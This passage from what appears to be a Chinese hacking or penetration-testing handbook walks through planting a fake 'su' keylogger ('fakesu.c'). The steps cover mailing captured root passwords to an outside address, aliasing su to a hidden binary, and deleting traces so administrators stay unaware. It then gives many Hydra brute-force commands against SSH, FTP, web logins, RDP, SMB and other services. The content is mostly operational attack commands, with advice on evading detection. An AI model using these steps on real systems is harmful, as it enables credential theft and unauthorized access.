运行该程序前,必须对程序进行修改,否则即使执行该程序也不会得到结果。在上面的程序代码中有3个地方需要修改,具体如下。 (1)修改密码记录的文件名称 在代码中修改sprintf(filex,"/var/tmp/.mail")函数。在该函数中默认生成的密码记录文件的后缀是“.mail”,可以将“.mail”修改为任意文件后缀(以上代码中共有3处需要修改,一定要将这3处全部修改)。 (2)修改反弹Shell主目录 将“sprintf(clean,"rm -rf/var/tmp/.su; mv -f /home/webshell/.wgetrc/home/webshell /.bash_profile");”中的“/home/webshell”修改为实际用户的主目录名称(以上代码中有2处需要修改)。 (3)修改邮件发送地址 将“system("uname -a >> /var/tmp/.mail; cat /var/tmp/.mail | mail admin@antian 365.com");”中的邮件地址修改为能够接收邮件的邮件地址。如果不需要接收邮件,可以将该行代码删除。 2.1.3 运行键盘记录程序 下面我们开始运行键盘记录程序。 01 将fakesu.c程序复制到用户目录下 如果具备SSH用户权限,可以通过SSH Secure Shell的文件传输功能将本地文件上传到服务器,如图2-1所示。如果具备WebShell权限,也可以通过WebShell将fakesu.c程序上传到服务器。如果是反弹的DOS命令提示符,则可以通过命令“wget http:// www.somesite.com/ fakesu.c”将其下载到服务器。 图2-1 将代码上传到服务器 02 再次检查代码 使用“cat fakesu.c”命令查看源程序代码,确认2.1.2节提及的3个地方都已正确修改,如图2-2所示。 图2-2 执行前检查源代码 03 执行命令 执行如下命令。 chmod 777 fakesu.c gcc -o .su fakesu.c; rm -rf fakesu.c mv .su /var/tmp/.su cd ~ cp .bash_profile .wgetrc cp .bash_profile .wgetrb echo "alias su=/var/tmp/.su">>.bash_profile logout “Chmod 777 fakesu.c”表示使程序“fakesu.c”具有最高权限。 “gcc -o .su fakesu.c; rm -rf fakesu.c”用于编译fakesu.c程序,生成.su文件,同时彻底删除fakesu.c程序。“rm -rf”用于在Linux中彻底删除文件及目录(不管目录中是否存在文件)。 “cd ~”用于转到当前Shell的主目录。 “cp .bash_profile .wgetrb”用于将.bash_profile文件备份成.wgetrb文件。 “echo "alias su=/var/tmp/.su">>.bash_profile”用于将用户登录的su命令指向“/var/tmp/.su”命令。 “Logout”用于注销当前SSH Secure Shell登录命令。如果是反弹Shell,可以使用“exit”命令。执行命令后,如图2-3所示,编译fakesu.c程序时可能会出现警告信息“webadm.c:19:警告:赋值时将整数赋给指针,未作类型转换”,该警告信息不会影响程序的正常运行。 图2-3 执行命令 04 查看密码记录文件 根据fakesu.c程序中设置的密码记录文件可知,在本例中记录的文件为“/var/tmp/.pwds”。该文件默认为隐藏属性,可以直接通过命令“cat /var/tmp/.pwds”查看,如图2-4所示,记录的root用户的密码为“simeon”。 图2-4 获取root用户的密码 05 删除安装文件 当fakesu.c程序成功记录root用户的密码后,需要删除安装的程序文件,否则时间久了容易引起管理员的警觉。可以使用以下命令删除程序文件。 rm -rf /var/tmp/.su cp .wgetrb .bash_profile rm -rf .wgetrc rm -rf /var/tmp/.pwds
2.2 暴力破解工具Hydra Hydra是世界顶级的密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,密码能否被破解的关键取决于破解字典是否足够强大。
在网络安全渗透过程中,Hydra是一款必备的测试工具,配合社工库进行社会工程学攻击,有时会获得意想不到的效果。 2.2.1 Hydra简介 Hydra是著名黑客组织thc开发的一款开源的暴力密码破解工具,可以在线破解多种密码,目前已经被Backtrack和kali等渗透平台收录。
Hydra的最新版本为Hydra 7.6,下载地址为http://www.thc.org/releases/hydra- 7.6.tar.gz,它支持AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、uHTTP-FORM-GET、HTTP-FORM- POST、HTTP-GET、HTTP-HEAD、HTTP-PROXY、HTTPS-FORM-GET、HTTPS-FORM-POST、HTTPS-GET、HTTPS-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NCP、NNTP、Oracle Listener、Oracle SID、Oracle、PC-Anywhere、PCNFS、POP3、POSTGRES、RDP、Rexec、Rlogin、Rsh、SAP/R3、SIP、SMB、SMTP、SMTP Enum、SNMP、SOCKS5、SSH(v1和v2)、Subversion、Teamspeak(TS2)、Telnet、VMware-Auth、VNC、XMPP等类型密码的破解。
2.2.2 Hydra的安装与使用 Hydra可以在Debian和Ubuntu等环境下安装和使用。 1.在Debian和Ubuntu环境下安装Hydra 如果是Debian和Ubuntu发行版,会自带Hydra,可直接使用apt-get命令在线安装,命令如下。
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra 如果要使用Redhat/Fedora发行版的源码包编译安装,需要先安装相关依赖包,命令如下。 yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel 2.安装CentOS CentOS的安装命令如下。
# tar zxvf hydra-7.6-src.tar.gz # cd hydra-6.0-src # ./configure # make # make install 3.使用Hydra BT5和kali都默认安装了Hydra。
在kali中,依次单击“kali Linux”→“Password Attacks”→“Online Attacks”→“hydra”选项即可打开Hydra。 在CentOS终端中,输入命令“/usr/local/bin/hydra”即可打开该暴力破解工具。
除此之外,还可以通过“hydra-wizard.sh”命令进行向导式设置来密码破解,如图2-5所示。 图2-5 使用hydra-wizard.sh进行密码破解 4.安装libssh 如果不安装libssh,运行Hydra破解账号时会出现错误。
yum install cmake wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz tar zxf libssh-0.4.8.tar.gz cd libssh-0.4.8 mkdir build cd build cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON .. make make install cd /test/ssh/hydra-7.6 //此为下载Hydar并解压的目录 make clean ./configure make make install 图2-6 libssh模块缺少错误 5.Hydra参数详细说明 Hydra命令示例如下。
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] -l LOGIN:指定破解的用户名称,对特定用户破解。 -L FILE:从文件中加载用户名进行破解。
service:指定服务名,支持的服务和协议包括Telnet、FTP、POP3[-ntlm]、IMAP[-ntlm]、SMB、SMB NT、http[s]-{head|get}、http-{get|post}-form、http-proxy、Cisco、Cisco-Enable、VNC、LDAP2、LDAP3、MSSQL、MySQL、Oracle-Listener、Postgres、NNTP、Socks5、REXEC、Rlogin、PCNFS、SNMP、RSH、CVS、SVN、ICQ、SAPR3、SSH2、SMTP-Auth[-ntlm]、pcAnywhere、TeamSpeak、SIP、Vmauthd、Firebird、NCP、AFP等。
1.破解SSH账号 破解SSH账号有两种方式,一种是指定账号破解,另一种是指定用户列表破解,命令如下。 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 例如,输入命令“hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh”,对IP地址为192.168.44.139的root账号密码进行破解,如图2-7所示,破解成功后显示其详细信息。
输入命令“hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh”,将扫描结果保存在save.log文件中,使用“cat save.log”命令查看扫描结果,如图2-8所示。
图2-7 破解SSH账号 图2-8 查看破解日志 2.破解FTP账号 (1)破解指定用户名密码 hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV (2)批量破解FTP账号和密码 hydra -L list_user -P list_password 192.168.56.101 ftp -V 对FTP服务器(192.168.56.101)进行密码破解,如图2-9所示。 图2-9 对FTP密码进行破解 3.GET方式提交,破解Web登录 hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php 4.POST方式提交,破解Web登录 (1)hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php: username= ^USER^ &password=^PASS^&submit=login:sorry password" hydra -L list_user -P list_password 192.168.0.115 http-post-form "member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmi t=yes&amp;inajax=1:fastloginfield=username&amp;username=^USER^&amp;password=^PASS^&amp;q uickforward=yes&amp;handlekey=ls:Login failed" –V 以上示例表示对192.168.0.115进行破解,需要定义登录的URL,以及设置登录验证和错误登录标记,效果如图2-10所示。 图2-10 对HTTP进行暴力破解 member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit =yes&amp;inajax=1 fastloginfield=username&amp;username=^USER^&amp;password=^PASS^&amp;quickforward=yes &amp;handlekey=ls Login failed (2)对admin密码进行破解 hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.0.115 http-post-form "login.php:id=^USER^&amp;passwd=^PASS^:<title>wrong username or password</title>" “-t”表示同时线程数为3;
5.破解HTTPS hydra -m /index.php -l muts -P pass.txt 192.168.0.115 https 6.破解teamspeak hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 7.破解Cisco hydra -P pass.txt 192.168.0.115 cisco hydra -m cloud -P pass.txt 192.168.0.115 cisco-enable 8.破解SMB hydra -l administrator -P pass.txt 192.168.0.115 smb 9.破解POP3 hydra -l muts -P pass.txt my.pop3.mail pop3 10.破解远程终端账号 (1)破解管理员账号 hydra ip rdp -l administrator -P pass.txt -V (2)批量破解账号 hydra -s 3389 192.168.44.138 rdp -L user.txt -P pwd.txt –V 破解效果如图2-11所示。 图2-11 破解3389账号 11.破解HTTP-Proxy hydra -l admin -P pass.txt http-proxy://192.168.0.115 12.破解IMAP hydra -L user.txt -p secret 192.168.0.115 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN 参考文章 http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/ http://www.aldeid.com/wiki/Thc-hydra#Install_Hydra
未知 2.3 Linux操作系统root账号密码的获取 Linux操作系统由于其开源性、低成本等特点,在商业上运用越来越多,很多公司都采用LAMP(Linux+Apache+MySQL+PHP)典型架构。
在Windows中,不论设置多么复杂的密码,都可以通过彩虹表、键盘记录、mimikatz_trunk域名注入获取密码等技术获取包括Windows 2008 Server在内的所有操作系统密码。